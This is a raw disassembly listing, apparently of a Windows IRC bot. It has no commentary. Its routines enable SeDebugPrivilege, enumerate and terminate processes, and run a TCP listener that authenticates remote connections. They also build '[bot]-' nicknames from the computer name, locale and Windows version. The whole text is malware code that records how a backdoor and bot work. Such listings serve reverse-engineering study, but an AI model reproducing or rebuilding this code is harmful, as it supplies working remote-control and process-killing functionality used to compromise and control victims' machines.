loc_4135D3: ; CODE XREF: sub_41358D+3E�j
and [ebp+var_8], 0FFFFFFFDh
loc_4135D7: ; CODE XREF: sub_41358D+44�j
push esi
push esi
lea eax, [ebp+var_14]
push esi
push eax
push esi
push [ebp+var_4]
call ds:dword_4364D4 ; AdjustTokenPrivileges
mov esi, eax
loc_4135EA: ; CODE XREF: sub_41358D+32�j
push [ebp+var_4]
call ds:off_422074
mov eax, esi
pop esi
leave
retn
sub_41358D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4135F8 proc near ; CODE XREF: sub_40D2E0+4B66�p
; sub_4137A9+74�p
var_550 = byte ptr -550h
var_350 = dword ptr -350h
var_34C = byte ptr -34Ch
var_230 = byte ptr -230h
var_12C = dword ptr -12Ch
var_128 = byte ptr -128h
var_124 = dword ptr -124h
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 550h
push ebx
push esi
push edi
push 49h
xor ebx, ebx
pop ecx
xor eax, eax
cmp ds:dword_436488, ebx
lea edi, [ebp+var_128]
mov [ebp+var_12C], ebx
rep stosd
mov ecx, 88h
lea edi, [ebp+var_34C]
mov [ebp+var_350], ebx
rep stosd
jz loc_4137A2
cmp ds:dword_43646C, ebx
jz loc_4137A2
cmp ds:dword_436388, ebx
jz loc_4137A2
push 1
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_41358D
pop ecx
pop ecx
push ebx
push 0Fh
call ds:dword_436488 ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_413795
lea eax, [ebp+var_12C]
mov [ebp+var_12C], 128h
push eax
push [ebp+var_4]
call ds:dword_43646C ; Process32First
mov esi, ds:off_422074
test eax, eax
jz loc_413790
loc_41369B: ; CODE XREF: sub_4135F8+BE�j
; sub_4135F8+CC�j ...
lea eax, [ebp+var_12C]
push eax
push [ebp+var_4]
call ds:dword_436388 ; Process32Next
test eax, eax
jz loc_413790
cmp [ebp+arg_10], ebx
jnz short loc_41369B
cmp [ebp+arg_C], ebx
jnz loc_413748
cmp [ebp+arg_4], ebx
jz short loc_41369B
push [ebp+var_124]
push 8
call ds:dword_436488 ; CreateToolhelp32Snapshot
cmp [ebp+arg_14], ebx
mov edi, eax
mov [ebp+var_350], 224h
jz short loc_413705
lea eax, [ebp+var_350]
push eax
push edi
call ds:dword_436334 ; Module32First
push [ebp+var_124]
test eax, eax
jz short loc_41370B
lea eax, [ebp+var_230]
jmp short loc_413711
; ---------------------------------------------------------------------------
loc_413705: ; CODE XREF: sub_4135F8+EB�j
push [ebp+var_124]
loc_41370B: ; CODE XREF: sub_4135F8+103�j
lea eax, [ebp+var_108]
loc_413711: ; CODE XREF: sub_4135F8+10B�j
push eax
lea eax, [ebp+var_550]
push offset aSD_0 ; " %s (%d)"
push eax
call sub_415480
add esp, 10h
lea eax, [ebp+var_550]
push 1
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BAE7
add esp, 14h
push edi
call esi ; sub_4DB3D5
jmp loc_41369B
; ---------------------------------------------------------------------------
loc_413748: ; CODE XREF: sub_4135F8+C3�j
push [ebp+arg_C]
lea eax, [ebp+var_108]
push eax
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz loc_41369B
push [ebp+var_124]
push ebx
push 1F0FFFh
call ds:dword_4220DC ; OpenProcess
push [ebp+var_4]
mov edi, eax
call esi ; sub_4DB3D5
push ebx
push edi
call ds:dword_422158 ; TerminateProcess
test eax, eax
jnz short loc_41378B
push edi
call esi ; sub_4DB3D5
jmp short loc_4137A2
; ---------------------------------------------------------------------------
loc_41378B: ; CODE XREF: sub_4135F8+18C�j
push 1
pop eax
jmp short loc_4137A4
; ---------------------------------------------------------------------------
loc_413790: ; CODE XREF: sub_4135F8+9D�j
; sub_4135F8+B5�j
push [ebp+var_4]
call esi ; sub_4DB3D5
loc_413795: ; CODE XREF: sub_4135F8+75�j
push ebx
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_41358D
pop ecx
pop ecx
loc_4137A2: ; CODE XREF: sub_4135F8+3A�j
; sub_4135F8+46�j ...
xor eax, eax
loc_4137A4: ; CODE XREF: sub_4135F8+196�j
pop edi
pop esi
pop ebx
leave
retn
sub_4135F8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4137A9 proc near ; DATA XREF: sub_40D2E0+595C�o
var_298 = byte ptr -298h
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 298h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
push offset unk_42E5F4
rep movsd
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_298]
push eax
call sub_415480
xor esi, esi
pop ecx
cmp [ebp+var_8], esi
pop ecx
jnz short loc_413808
push esi
lea eax, [ebp+var_298]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push [ebp+var_98]
call sub_40BAE7
add esp, 14h
loc_413808: ; CODE XREF: sub_4137A9+3D�j
push [ebp+var_10]
lea eax, [ebp+var_94]
push esi
push esi
push [ebp+var_C]
push eax
push [ebp+var_98]
call sub_4135F8
add esp, 18h
test eax, eax
jnz short loc_413830
push offset unk_42E5BC
jmp short loc_413835
; ---------------------------------------------------------------------------
loc_413830: ; CODE XREF: sub_4137A9+7E�j
push offset unk_42E584
loc_413835: ; CODE XREF: sub_4137A9+85�j
lea eax, [ebp+var_298]
push eax
call sub_415480
cmp [ebp+var_8], esi
pop ecx
pop ecx
jnz short loc_413868
push esi
lea eax, [ebp+var_298]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push [ebp+var_98]
call sub_40BAE7
add esp, 14h
loc_413868: ; CODE XREF: sub_4137A9+9D�j
lea eax, [ebp+var_298]
push eax
call sub_40A5B3
push [ebp+var_14]
call sub_415248
pop ecx
pop ecx
push esi
call ds:dword_422044 ; ExitThread
pop edi
pop esi
sub_4137A9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_413887 proc near ; CODE XREF: sub_40D2E0+4B08�p
; sub_415067+53�p
arg_0 = dword ptr 4
push esi
push edi
push 1
pop edi
push [esp+8+arg_0]
push 0
push 1F0FFFh
call ds:dword_4220DC ; OpenProcess
mov esi, eax
test esi, esi
jz short loc_4138B9
push 0
push esi
call ds:dword_422158 ; TerminateProcess
test eax, eax
jnz short loc_4138B9
push esi
xor edi, edi
call ds:off_422074
loc_4138B9: ; CODE XREF: sub_413887+1A�j
; sub_413887+27�j
mov eax, edi
pop edi
pop esi
retn
sub_413887 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4138BE proc near ; CODE XREF: sub_403A1B+63�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
call sub_4154DC
mov esi, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
fild [ebp+var_4]
sub eax, esi
mov [ebp+arg_4], eax
fimul [ebp+arg_4]
fmul ds:dbl_422688
call sub_415F6C
sub esi, eax
mov eax, esi
pop esi
leave
retn
sub_4138BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4138EE proc near ; DATA XREF: sub_413B7C+1BE�o
var_3D4 = byte ptr -3D4h
var_350 = byte ptr -350h
var_208 = dword ptr -208h
var_1F4 = dword ptr -1F4h
var_1F0 = dword ptr -1F0h
var_F0 = byte ptr -0F0h
var_B0 = byte ptr -0B0h
var_4C = byte ptr -4Ch
var_3C = byte ptr -3Ch
var_2C = byte ptr -2Ch
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 78h
mov esi, eax
pop ecx
lea edi, [ebp+var_3D4]
push 1
mov [ebp+var_C], 1Eh
pop ebx
rep movsd
mov [eax+1DCh], ebx
mov eax, [ebp+var_208]
mov [ebp+arg_0], eax
imul eax, 234h
lea esi, dword_43BECC[eax]
xor edi, edi
mov [ebp+var_8], edi
mov [ebp+var_1F4], ebx
mov eax, [esi]
mov [ebp+var_1F0], eax
lea eax, [ebp+var_C]
push eax
push edi
lea eax, [ebp+var_1F4]
push edi
push eax
push edi
call ds:dword_436450 ; select
test eax, eax
jnz short loc_413972
push dword ptr [esi]
call ds:dword_436500 ; closesocket
push [ebp+arg_0]
call sub_415248
pop ecx
push edi
call ds:dword_422044 ; ExitThread
loc_413972: ; CODE XREF: sub_4138EE+6A�j
push edi
lea eax, [ebp+var_3C]
push ebx
push eax
push dword ptr [esi]
call ds:dword_436480 ; recv
lea eax, [ebp+var_2C]
push 10h
push eax
push dword ptr [esi]
call sub_413AF3
lea eax, [ebp+var_4C]
push 10h
push eax
push dword ptr [esi]
call sub_413AF3
lea eax, [ebp+var_F0]
push 40h
push eax
push dword ptr [esi]
call sub_413AF3
add esp, 24h
lea eax, [ebp+var_4]
mov [ebp+var_4], 10h
push eax
lea eax, [ebp+var_1C]
push eax
push dword ptr [esi]
call ds:dword_4363C4 ; getpeername
test eax, eax
jz short loc_4139EB
call ds:dword_4363FC ; WSAGetLastError
push eax
push offset dword_42E6E8
call sub_40A627
push [ebp+arg_0]
call sub_415248
add esp, 0Ch
push edi
call ds:dword_422044 ; ExitThread
loc_4139EB: ; CODE XREF: sub_4138EE+D8�j
push 2
lea eax, [ebp+var_18]
push 4
push eax
call ds:dword_436420 ; gethostbyaddr
cmp eax, edi
jnz short loc_413A15
push [ebp+var_18]
call ds:dword_4364F4 ; inet_ntoa
push eax
lea eax, [ebp+var_B0]
push eax
call sub_415480
jmp short loc_413A23
; ---------------------------------------------------------------------------
loc_413A15: ; CODE XREF: sub_4138EE+10D�j
push dword ptr [eax]
lea eax, [ebp+var_B0]
push eax
call sub_415B90
loc_413A23: ; CODE XREF: sub_4138EE+125�j
pop ecx
pop ecx
push edi
push ebx
push offset byte_4325D8
push dword ptr [esi]
call ds:dword_4364B8 ; send
cmp ds:dword_4C8E4C, edi
jnz short loc_413A85
push [ebp+var_18]
lea eax, [ebp+var_350]
push eax
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_2C]
push eax
call sub_413B4D
add esp, 10h
test eax, eax
jnz short loc_413A85
push edi
push 13h
push offset aPermissionDeni ; "Permission denied\n"
push dword ptr [esi]
call ds:dword_4364B8 ; send
push dword ptr [esi]
call ds:dword_436500 ; closesocket
push [ebp+arg_0]
call sub_415248
pop ecx
push edi
call ds:dword_422044 ; ExitThread
loc_413A85: ; CODE XREF: sub_4138EE+14C�j
; sub_4138EE+16D�j
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_2C]
push eax
push offset dword_42E69C
call sub_40A627
push [ebp+arg_0]
call sub_414A34
add esp, 10h
test eax, eax
jnz short loc_413ACC
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset dword_42E660
call sub_40A627
push [ebp+arg_0]
call sub_415248
add esp, 0Ch
push ebx
call ds:dword_422044 ; ExitThread
loc_413ACC: ; CODE XREF: sub_4138EE+1B9�j
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_2C]
push eax
push offset dword_42E628
call sub_40A627
push [ebp+arg_0]
call sub_415248
add esp, 10h
push edi
call ds:dword_422044 ; ExitThread
sub_4138EE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413AF3 proc near ; CODE XREF: sub_4138EE+9A�p
; sub_4138EE+A7�p ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push esi
push 0
lea eax, [ebp+var_1]
push 1
push eax
push [ebp+arg_0]
call ds:dword_436480 ; recv
cmp eax, 1
jnz short loc_413B43
mov esi, [ebp+arg_4]
loc_413B11: ; CODE XREF: sub_413AF3+41�j
mov al, [ebp+var_1]
mov [esi], al
inc esi
dec [ebp+arg_8]
jz short loc_413B38
test al, al
jz short loc_413B47
push 0
lea eax, [ebp+var_1]
push 1
push eax
push [ebp+arg_0]
call ds:dword_436480 ; recv
cmp eax, 1
jz short loc_413B11
jmp short loc_413B43
; ---------------------------------------------------------------------------
loc_413B38: ; CODE XREF: sub_413AF3+27�j
push offset dword_42E724
call sub_40A627
pop ecx
loc_413B43: ; CODE XREF: sub_413AF3+19�j
; sub_413AF3+43�j
xor eax, eax
jmp short loc_413B4A
; ---------------------------------------------------------------------------
loc_413B47: ; CODE XREF: sub_413AF3+2B�j
push 1
pop eax
loc_413B4A: ; CODE XREF: sub_413AF3+52�j
pop esi
leave
retn
sub_413AF3 endp
; =============== S U B R O U T I N E =======================================
sub_413B4D proc near ; CODE XREF: sub_4138EE+163�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push [esp+arg_0]
push [esp+4+arg_8]
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz short loc_413B78
push [esp+arg_4]
push [esp+4+arg_0]
push offset dword_42E75C
call sub_40A627
add esp, 0Ch
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_413B78: ; CODE XREF: sub_413B4D+11�j
push 1
pop eax
retn
sub_413B4D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413B7C proc near ; DATA XREF: sub_40D2E0+5623�o
var_5DC = dword ptr -5DCh
var_5A4 = byte ptr -5A4h
var_414 = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_24 = byte ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5A4h
mov eax, [ebp+arg_0]
push esi
push edi
push 78h
pop ecx
mov esi, eax
lea edi, [ebp+var_214]
push 1
rep movsd
pop edi
mov [eax+1DCh], edi
lea eax, [ebp+var_5A4]
push eax
push 202h
call ds:dword_4363E0 ; WSAStartup
xor esi, esi
cmp eax, esi
jz short loc_413BD5
push eax
push offset dword_42E920
call sub_40A627
push [ebp+var_4C]
call sub_415248
add esp, 0Ch
push edi
call ds:dword_422044 ; ExitThread
loc_413BD5: ; CODE XREF: sub_413B7C+3A�j
push edi
push offset loc_413DFA
call ds:dword_42215C ; SetConsoleCtrlHandler
test eax, eax
jnz short loc_413C0E
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset dword_42E8D0
call sub_40A627
pop ecx
pop ecx
call ds:dword_4363C8 ; WSACleanup
push [ebp+var_4C]
call sub_415248
pop ecx
push edi
call ds:dword_422044 ; ExitThread
loc_413C0E: ; CODE XREF: sub_413B7C+67�j
push ebx
push 10h
lea eax, [ebp+var_20]
push esi
push eax
call sub_415500
add esp, 0Ch
mov [ebp+var_20], 2
push [ebp+var_50]
call ds:dword_436468 ; htons
push 6
push edi
push 2
mov [ebp+var_1E], ax
mov [ebp+var_1C], esi
call ds:dword_4364E8 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_413D85
mov eax, [ebp+var_4C]
push 10h
imul eax, 234h
mov ds:dword_43BECC[eax], ebx
lea eax, [ebp+var_20]
push eax
push ebx
call ds:dword_436494 ; bind
test eax, eax
jnz loc_413D85
push 7FFFFFFFh
push ebx
call ds:dword_436490 ; listen
test eax, eax
jnz loc_413D85
push offset dword_42E884
mov [ebp+var_10], 0Ch
mov [ebp+var_C], esi
mov [ebp+var_8], esi
call sub_40A5B3
pop ecx
mov [ebp+arg_0], edi
loc_413C9D: ; CODE XREF: sub_413B7C+15A�j
; sub_413B7C+1E4�j
lea eax, [ebp+var_4]
mov [ebp+var_4], 10h
push eax
lea eax, [ebp+var_34]
push eax
push ebx
call ds:dword_4364FC ; accept
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_413D88
push [ebp+arg_0]
lea eax, [ebp+arg_0]
push eax
push 8
push 0FFFFh
push edi
call ds:dword_436448 ; setsockopt
cmp eax, 0FFFFFFFFh
jz short loc_413C9D
movzx eax, [ebp+var_32]
push [ebp+var_4C]
mov [ebp+var_38], esi
push eax
push [ebp+var_30]
call ds:dword_4364F4 ; inet_ntoa
push eax
lea eax, [ebp+var_414]
push offset dword_42E830
push eax
call sub_415480
lea eax, [ebp+var_414]
push eax
call sub_40A5B3
push edi
lea eax, [ebp+var_414]
push 6
push eax
call sub_414F2C
mov [ebp+var_48], eax
imul eax, 234h
mov ecx, [ebp+var_4C]
add esp, 24h
mov ds:dword_43BEC4[eax], ecx
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_214]
push esi
push eax
push offset sub_4138EE
lea eax, [ebp+var_10]
push esi
push eax
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_48]
imul ecx, 234h
cmp eax, esi
mov ds:dword_43BED4[ecx], eax
jz short loc_413D70
loc_413D5D: ; CODE XREF: sub_413B7C+1F2�j
cmp [ebp+var_38], esi
jnz loc_413C9D
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_413D5D
; ---------------------------------------------------------------------------
loc_413D70: ; CODE XREF: sub_413B7C+1DF�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset dword_42E7E4
call sub_40A627
pop ecx
pop ecx
jmp short loc_413D88
; ---------------------------------------------------------------------------
loc_413D85: ; CODE XREF: sub_413B7C+C8�j
; sub_413B7C+EC�j ...
mov edi, [ebp+arg_0]
loc_413D88: ; CODE XREF: sub_413B7C+13C�j
; sub_413B7C+207�j
call ds:dword_4363FC ; WSAGetLastError
push eax
lea eax, [ebp+var_414]
push offset dword_42E7A0
push eax
call sub_415480
add esp, 0Ch
cmp [ebp+var_3C], esi
jnz short loc_413DC8
push esi
lea eax, [ebp+var_414]
push [ebp+var_40]
push eax
lea eax, [ebp+var_210]
push eax
push [ebp+var_214]
call sub_40BAE7
add esp, 14h
loc_413DC8: ; CODE XREF: sub_413B7C+22A�j
lea eax, [ebp+var_414]
push eax
call sub_40A5B3
pop ecx
push edi
call ds:dword_436500 ; closesocket
push ebx
call ds:dword_436500 ; closesocket
call ds:dword_4363C8 ; WSACleanup
push [ebp+var_4C]
call sub_415248
pop ecx
push esi
call ds:dword_422044 ; ExitThread
pop ebx
loc_413DFA: ; DATA XREF: sub_413B7C+5A�o
xor eax, eax
cmp [esp+5E0h+var_5DC], eax
setz al
retn
sub_413B7C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_413E04 proc near ; CODE XREF: sub_41416F+49�p
; DATA XREF: _2:off_42E970�o
var_C = dword ptr -0Ch
arg_0 = dword ptr 4
push esi
push edi
call ds:dword_422048 ; GetTickCount
push eax
call sub_4154D2
mov edi, [esp+0Ch+arg_0]
mov [esp+0Ch+var_C], offset aBot ; "[bot]-"
push offset aS_2 ; "%s"
push 1Ch
push edi
call sub_4159FA
xor esi, esi
add esp, 10h
cmp ds:dword_42ACE0, esi
jle short loc_413E5D
loc_413E37: ; CODE XREF: sub_413E04+57�j
call sub_4154DC
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset dword_42E9C4
push 1Ch
push edi
call sub_4159FA
add esp, 14h
inc esi
cmp esi, ds:dword_42ACE0
jl short loc_413E37
loc_413E5D: ; CODE XREF: sub_413E04+31�j
mov eax, edi
pop edi
pop esi
retn
sub_413E04 endp
; =============== S U B R O U T I N E =======================================
sub_413E62 proc near ; CODE XREF: sub_40D2E0+3E7F�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
call ds:dword_422048 ; GetTickCount
push eax
call sub_4154D2
pop ecx
call sub_4154DC
push 3
mov ebx, [esp+10h+arg_0]
cdq
pop ecx
xor edi, edi
idiv ecx
mov esi, edx
add esi, ds:dword_42ACE0
test esi, esi
jle short loc_413EA5
loc_413E8F: ; CODE XREF: sub_413E62+41�j
call sub_4154DC
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [edi+ebx], dl
inc edi
cmp edi, esi
jl short loc_413E8F
loc_413EA5: ; CODE XREF: sub_413E62+2B�j
and byte ptr [edi+ebx], 0
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_413E62 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ecx
and dword ptr [ebp-4], 0
push esi
push edi
mov dword ptr [ebp-8], 100h
call ds:dword_422048 ; GetTickCount
push eax
call sub_4154D2
pop ecx
lea eax, [ebp-8]
mov esi, offset byte_42E9CC
push eax
push esi
call ds:dword_422138 ; GetComputerNameA
movsx eax, ds:byte_42E9CC
push 41h
pop ecx
push 1
pop edx
loc_413EEB: ; CODE XREF: _0:00413EF6�j
cmp eax, ecx
jnz short loc_413EF2
mov [ebp-4], edx
loc_413EF2: ; CODE XREF: _0:00413EED�j
inc ecx
cmp ecx, 5Bh
jl short loc_413EEB
push 61h
pop ecx
loc_413EFB: ; CODE XREF: _0:00413F06�j
cmp eax, ecx
jnz short loc_413F02
mov [ebp-4], edx
loc_413F02: ; CODE XREF: _0:00413EFD�j
inc ecx
cmp ecx, 7Bh
jl short loc_413EFB
mov edi, [ebp+8]
push esi
push 1Ch
push edi
call sub_4159FA
xor esi, esi
add esp, 0Ch
cmp ds:dword_42ACE0, esi
jle short loc_413F47
loc_413F21: ; CODE XREF: _0:00413F45�j
call sub_4154DC
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset dword_42E9C4
push 1Ch
push edi
call sub_4159FA
add esp, 14h
inc esi
cmp esi, ds:dword_42ACE0
jl short loc_413F21
loc_413F47: ; CODE XREF: _0:00413F1F�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
call ds:dword_422048 ; GetTickCount
push eax
call sub_4154D2
pop ecx
lea eax, [ebp-0Ch]
push 0Ah
push eax
push 7
push 800h
call ds:dword_422160 ; GetLocaleInfoA
mov edi, [ebp+8]
lea eax, [ebp-0Ch]
push eax
push offset dword_42E9D0
push 1Ch
push edi
call sub_4159FA
xor esi, esi
add esp, 10h
cmp ds:dword_42ACE0, esi
jle short loc_413FBC
loc_413F96: ; CODE XREF: _0:00413FBA�j
call sub_4154DC
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset dword_42E9C4
push 1Ch
push edi
call sub_4159FA
add esp, 14h
inc esi
cmp esi, ds:dword_42ACE0
jl short loc_413F96
loc_413FBC: ; CODE XREF: _0:00413F94�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 94h
push esi
lea eax, [ebp-94h]
push edi
push eax
mov esi, offset byte_4325D8
mov dword ptr [ebp-94h], 94h
call ds:dword_422124 ; GetVersionExA
call ds:dword_422048 ; GetTickCount
push eax
call sub_4154D2
cmp dword ptr [ebp-90h], 4
pop ecx
jnz short loc_414046
cmp dword ptr [ebp-8Ch], 0
jnz short loc_414026
cmp dword ptr [ebp-84h], 1
jnz short loc_414016
mov esi, offset a95 ; "95"
loc_414016: ; CODE XREF: _0:0041400F�j
cmp dword ptr [ebp-84h], 2
jnz short loc_414082
mov esi, offset aNt ; "NT"
jmp short loc_414082
; ---------------------------------------------------------------------------
loc_414026: ; CODE XREF: _0:00414006�j
cmp dword ptr [ebp-8Ch], 0Ah
jnz short loc_414036
mov esi, offset a98 ; "98"
jmp short loc_414082
; ---------------------------------------------------------------------------
loc_414036: ; CODE XREF: _0:0041402D�j
cmp dword ptr [ebp-8Ch], 5Ah
jnz short loc_41407D
mov esi, offset aMe ; "ME"
jmp short loc_414082
; ---------------------------------------------------------------------------
loc_414046: ; CODE XREF: _0:00413FFD�j
cmp dword ptr [ebp-90h], 5
jnz short loc_41407D
cmp dword ptr [ebp-8Ch], 0
jnz short loc_41405F
mov esi, offset a2k ; "2K"
jmp short loc_414082
; ---------------------------------------------------------------------------
loc_41405F: ; CODE XREF: _0:00414056�j
cmp dword ptr [ebp-8Ch], 1
jnz short loc_41406F
mov esi, offset aXp ; "XP"
jmp short loc_414082
; ---------------------------------------------------------------------------
loc_41406F: ; CODE XREF: _0:00414066�j
cmp dword ptr [ebp-8Ch], 2
mov esi, offset dword_42E9DC
jz short loc_414082
loc_41407D: ; CODE XREF: _0:0041403D�j _0:0041404D�j
mov esi, offset dword_4294F4
loc_414082: ; CODE XREF: _0:0041401D�j _0:00414024�j ...
mov edi, [ebp+8]
push esi
push offset dword_42E9D4
push 1Ch
push edi
call sub_4159FA
xor esi, esi
add esp, 10h
cmp ds:dword_42ACE0, esi
jle short loc_4140C6
loc_4140A0: ; CODE XREF: _0:004140C4�j
call sub_4154DC
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset dword_42E9C4
push 1Ch
push edi
call sub_4159FA
add esp, 14h
inc esi
cmp esi, ds:dword_42ACE0
jl short loc_4140A0
loc_4140C6: ; CODE XREF: _0:0041409E�j
mov eax, edi
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4140CC proc near ; CODE XREF: sub_41416F+5C�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
call ds:dword_422048 ; GetTickCount
xor edx, edx
mov ecx, 5265C00h
div ecx
push 0
push offset aMirc ; "mIRC"
mov esi, eax
cmp esi, 64h
jbe short loc_41411B
call ds:dword_436474 ; FindWindowA
test eax, eax
mov eax, offset dword_42E9E8
jnz short loc_414104
mov eax, offset byte_4325D8
loc_414104: ; CODE XREF: sub_4140CC+31�j
push eax
push esi
push offset dword_42E9E0
lea eax, [ebp+var_1C]
push 1Ch
push eax
call sub_4159FA
add esp, 14h
jmp short loc_41413B
; ---------------------------------------------------------------------------
loc_41411B: ; CODE XREF: sub_4140CC+22�j
call ds:dword_436474 ; FindWindowA
test eax, eax
mov eax, offset dword_42E9E8
jnz short loc_41412F
mov eax, offset byte_4325D8
loc_41412F: ; CODE XREF: sub_4140CC+5C�j
push eax
lea eax, [ebp+var_1C]
push eax
call sub_415480
pop ecx
pop ecx
loc_41413B: ; CODE XREF: sub_4140CC+4D�j
lea eax, [ebp+var_1C]
push eax
call sub_415C80
pop ecx
cmp eax, 2
pop esi
jbe short loc_41416A
push 1Ch
lea eax, [ebp+var_1C]
push [ebp+arg_0]
push eax
call sub_416F00
lea eax, [ebp+var_1C]
push 1Ch
push eax
push [ebp+arg_0]
call sub_416D30
add esp, 18h
loc_41416A: ; CODE XREF: sub_4140CC+7D�j
mov eax, [ebp+arg_0]
leave
retn
sub_4140CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41416F proc near ; CODE XREF: sub_40D000+7F�p
; sub_40D168+50�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
xor edi, edi
mov esi, offset dword_42E96C
loc_41417B: ; CODE XREF: sub_41416F+3F�j
cmp [ebp+arg_C], 0
jz short loc_414196
lea eax, [esi-0Ch]
push eax
push [ebp+arg_C]
call sub_4158A0
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_4141A0
; ---------------------------------------------------------------------------
loc_414196: ; CODE XREF: sub_41416F+10�j
mov ecx, [esi]
xor eax, eax
cmp ecx, [ebp+arg_4]
setz al
loc_4141A0: ; CODE XREF: sub_41416F+25�j
test eax, eax
jnz short loc_4141B2
add esi, 14h
inc edi
cmp esi, offset dword_42E9D0
jb short loc_41417B
jmp short loc_4141C0
; ---------------------------------------------------------------------------
loc_4141B2: ; CODE XREF: sub_41416F+33�j
push [ebp+arg_0]
lea eax, [edi+edi*4]
call ds:off_42E970[eax*4]
pop ecx
loc_4141C0: ; CODE XREF: sub_41416F+41�j
cmp [ebp+arg_8], 0
pop edi
pop esi
jz short loc_4141D3
push [ebp+arg_0]
call sub_4140CC
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4141D3: ; CODE XREF: sub_41416F+57�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_41416F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4141D8 proc near ; DATA XREF: sub_4142A5+7B�o
var_B8 = dword ptr -0B8h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0B8h
mov eax, [ebp+arg_0]
push esi
push edi
push 2Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_B8]
push 1
rep movsd
pop esi
mov [eax+0A4h], esi
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_415500
add esp, 0Ch
mov [ebp+var_10], 2
